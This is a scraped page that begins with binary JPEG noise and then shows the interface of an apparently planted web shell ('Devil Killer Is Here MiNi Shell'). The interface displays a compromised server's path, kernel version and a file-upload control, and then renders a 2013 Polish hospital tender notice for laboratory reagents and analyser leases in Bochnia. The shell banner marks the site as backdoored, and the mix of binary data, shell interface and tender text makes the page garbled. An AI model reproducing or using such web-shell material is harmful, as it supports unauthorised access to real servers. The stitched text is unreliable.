JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131023/222265-N-2013.html

<p class="kh_header"><b>Bochnia: Dostawa odczynników, innych materiałów laboratoryjnych oraz dzierżawa analizatorów i czytnika wraz z wyposażeniem dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 222265 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników, innych materiałów laboratoryjnych oraz dzierżawa analizatorów i czytnika wraz z wyposażeniem dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa odczynników, innych materiałów laboratoryjnych oraz dzierżawa analizatorów i czytnika wraz z wyposażeniem dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej  opisanych w sposób szczegółowy w załączniku 
2.	Przedmiot zamówienia został podzielony według następujących pakietów
Pakiet nr 1 - Odczynniki do immunochemii wraz z dzierżawą  analizatora immunochemiczngo
Pakiet 2 - Odczynniki, akcesoria i części zużywalne z zakresu chemii klinicznej do posiadanego analizatora biochemicznego KONELAB 20 ISE wraz z dzierżawą zastępczego analizatora biochemicznego kompatybilnego z posiadanym (pracującego  w tym samym systemie odczynnikowym z wykorzystaniem tych samych akcesoriów i części zużywalnych)
Pakiet nr 3 - Krążki antybiotykowe i diagnostyczne
Pakiet nr 4 - Płytki gotowe, testy lateksowe, odczynniki.  
Pakiet nr 5 - Płytki gotowe chromogenne
Pakiet nr 6 - Testy paskowe do idetyfikacji drobnoustrojów  wraz z dzierżawą czytnika z wyposażeniem
Pakiet nr 7 - Szczepy wzorcowe z kolekcji amerykańskiej ATCC
Pakiet nr  8 - System paskowy do ilościowego określania  MIC na paskach plastikowych
Pakiet nr 9 - Odczynniki serologiczne  
Pakiet nr 10 - Testy  immunochromatograficzne
Pakiet nr 11 - Odczynniki laboratoryjne 
Pakiet nr 12 - Testy
Pakiet nr 13 - Odczynniki do aparatu CHROM 3003 
Pakiet nr 14 - Odczynniki i materiały zużywalne do analizatorów parametrów krytycznych ABL 835-FLEX wraz z dzierżawą aparatu  kompatybilnego z posiadanym
Pakiet nr 15- Odczynniki do aparatu Sysmex KX-21
Pakiet nr 16 - Odczynniki do aparatu Labu-Reader
Pakiet nr 17 - Papier do aparatów laboratoryjnych
Pakiet nr 18 - Laboratoryjny sprzęt medyczny II
Pakiet nr 19 - Zamknięty system do pobierani krwi
Pakiet Nr 20 - Probówki, szkiełka
Pakiet nr 21- Odczynniki do analizatora hematologicznego  wraz z dzierżawą aparatu 
Pakiet nr 22 - Odczynniki  do koagulologii wraz z dzierżawą analizatora 
Pakiet nr 23 - Odczynniki immunochemiczne wraz z dzierżawą analizatora immunochemicznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6, 33.79.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1a.	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca składający ofertę na jeden pakiet wykaże posiadanie wiedzy i doświadczenia rozumianej jako zasób umiejętności, praktykę i wprawę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wyrażające się w wykonaniu co najmniej dwóch dostaw, każda odpowiadająca zakresem dostaw i wartością brutto według zestawienia poniżej

Pakiet nr 1 - Odczynniki do immunochemii wraz z dzierżawą  analizatora immunochemiczngo	 130 000,00 zł 
Pakiet 2 - Odczynniki, akcesoria i części zużywalne z zakresu chemii klinicznej do posiadanego analizatora biochemicznego KONELAB 20 ISE wraz z dzierżawą zastępczego analizatora biochemicznego kompatybilnego z posiadanym (pracującego  w tym samym systemie odczynnikowym z wykorzystaniem tych samych akcesoriów i części zużywalnych)	153 000,00 zł 
Pakiet nr 3 - Krążki antybiotykowe i diagnostyczne	4 200,00 zł 
Pakiet nr 4 - Płytki gotowe, testy lateksowe, odczynniki.  	24 000,00 zł 
Pakiet nr 5 - Płytki gotowe chromogenne	7 100,00 zł 
Pakiet nr 6 - Testy paskowe do idetyfikacji drobnoustrojów  wraz z dzierżawą czytnika z wyposażeniem	18 000,00 zł 
Pakiet nr 7 - Szczepy wzorcowe z kolekcji amerykańskiej ATCC	2 300,00 zł 
Pakiet nr  8 - System paskowy do ilościowego określania  MIC na paskach plastikowych	 4 300,00 zł 
Pakiet nr 9 - Odczynniki serologiczne  	22 000,00 zł 
Pakiet nr 10 - Testy  immunochromatograficzne	 3 400,00 zł 
Pakiet nr 11 - Odczynniki laboratoryjne 	1 400,00 zł 
Pakiet nr 12 - Testy	1 800,00 zł 
Pakiet nr 13 - Odczynniki do aparatu CHROM 3003 	1 800,00 zł 
Pakiet nr 14 - Odczynniki i materiały zużywalne do analizatorów parametrów krytycznych ABL 835-FLEX wraz z dzierżawą aparatu  kompatybilnego z posiadanym	68 000,00 zł 
Pakiet nr 15- Odczynniki do aparatu Sysmex KX-21	10 000,00 zł 
Pakiet nr 16 - Odczynniki do aparatu Labu-Reader	 17 000,00 zł 
Pakiet nr 17 - Papier do aparatów laboratoryjnych	 42,00 zł 
Pakiet nr 18 - Laboratoryjny sprzęt medyczny II	 15 000,00 zł 
Pakiet nr 19 - Zamkniety system do pobierani krwi	34 000,00 zł 
Pakiet Nr 20 - Probówki, szkiełka	  9 000,00 zł 
Pakiet nr 21- Odczynniki do analizatora hematologicznego  wraz z dzierżawą aparatu 	30 000,00 zł 
Pakiet nr 22 - Odczynniki  do koagulologii wraz z dzierżawą analizatora 	5 000,00 zł 
Pakiet nr 23 - Odczynniki immunochemiczne wraz z dzierżawą analizatora immunochemicznego 	63 000,00 zł 

1b.	Wykonawca składający ofertę na więcej niż jeden pakiet musi wykazać posiadanie wiedzy i doświadczenia rozumianej jako zasób umiejętności, praktykę i wprawę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wyrażające się w wykonaniu co najmniej dwóch dostaw, każda odpowiadająca zakresem dostaw i wartością brutto (minimum) określoną dla najdroższego pakietu - określoną w wymaganiach Zamawiającego według zestawienia powyżej

Na przykład: 
1) jeżeli Wykonawca złoży ofertę na pakiet nr 1,2,3  - powinien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie dostawy odpowiadające zakresem dostaw i wartością brutto ( minimum) 153 000,00 zł (pakiet nr 2);
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę wykaz, o którym mowa w punkcie III.4.1) ppkt1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga złożenia wykazu (według załącznika nr 5 siwz), wraz z dowodami potwierdzającymi dostawy o których mowa w pkt. III.3.2), że zostały one wykonane lub są wykonywane należycie. 
Dowodami, o których mowa powyżej jest poświadczenie z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia;
W przypadku gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa powyżej zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt III.4. 1) pkt 1).
W miejsce poświadczeń, o których mowa powyżej Wykonawca może przedłożyć dokumenty potwierdzające należyte wykonanie usług określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) tj. dokumenty dotychczas wykorzystywane przez wykonawców;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1).	Oświadczenie, że wszystkie pozycje, stanowiące przedmiot zamówienia, które tego wymagają, zawarte w FORMULARZU ASORTYMENTOWO-CENOWYM, stanowiącym ZAŁĄCZNIK do oferty, spełniają wymagania przewidziane w  ustawie o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2010 nr 107 poz. 679), a także w obowiązujących przepisach Unii Europejskiej (zawarte w załączniku nr 1)
2).	Dla analizatora/czytnika: karta katalogowa/folder ze zdjęciem/rysunkiem lub inne dokumenty w języku polskim potwierdzające oferowane parametry techniczno - funkcjonalne zawierające dane określone w wymaganiach dla sprzętu, potwierdzone za zgodność
3).	Dla pakietu nr 1, 2, 21, 22, 23 - Ulotki do odczynników, 
4).	Dla pakietu nr 3 - Certyfikaty Kontroli Jakości przykładowy dla krążków antybiotykowych, 
5).	Dla pakietu nr 4 - Certyfikat ISO 9001 na produkcję podłoży gotowych na płytkach, Certyfikaty Kontroli Jakości przykładowy dla podłoży na płytkach, Certyfikat ISO 13485:2003, Wykaz stosowanych przez Wykonawcę terminów ważności pożywek, potwierdzający wymagane terminy przez Zamawiającego
6).	Dla pakietu nr 5 - Certyfikat ISO 9001 na produkcję podłoży gotowych na płytkach, Certyfikaty Kontroli Jakości przykładowy dla podłoży na płytkach, Certyfikat ISO 13485:2003, Wykaz stosowanych przez Wykonawcę terminów ważności pożywek, potwierdzający wymagane terminy przez Zamawiającego
7).	Dla pakietu nr 7 - przykładowy certyfikat kontroli jakości z dokumentacją pochodzenia szczepu
8).	Dla pakietu nr 8 - przykładowy certyfikat kontroli jakości, rekomendacja KORLD
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg formuły: spełnia/ nie spełnia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. 
W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego 
i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego produktu,
b)	nazwy produktu przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
d)	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę cen jednostkowych towaru objętego umową z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych, w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych,
5.	Zamawiający każdorazowo dopuszcza dostawy produktów leczniczych po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny. 
6.	Zaistnienie okoliczności wymienionych w ust  5  nie wymaga sporządzenia aneksu.
7.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji oferowanego produktu
b)	wygaśnięcia rejestracji oferowanego produktu
8.	Na potwierdzenie okoliczności, o których mowa w ust. 7 Wykonawca przedstawi pisemne zawiadomienie producenta.
9.	Wykonawca w sytuacji określonej w ust.7, w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej pod rygorem nieważności. 
10.	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
11.	Strony zgodnie ustalają, iż zgodnie z art. 144 ust. 1 ustawy zmianie może ulec wyłącznie typ/model oferowanego sprzętu - zapis dotyczy pakietów wraz z dzierżawą.
12.	Zmiana, o której mowa w ust. 11 jest dopuszczalna wyłącznie pod warunkiem, iż parametry techniczne sprzętu określone w załączniku nr 1 do niniejszej umowy zostaną zachowane na poziomie takim samym lub wyższym - zapis dotyczy pakietów wraz z dzierżawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul.  Krakowska 31, 32-700 Bochnia Dział Zaopatrzenia i Zamówień Publicznych.</p>
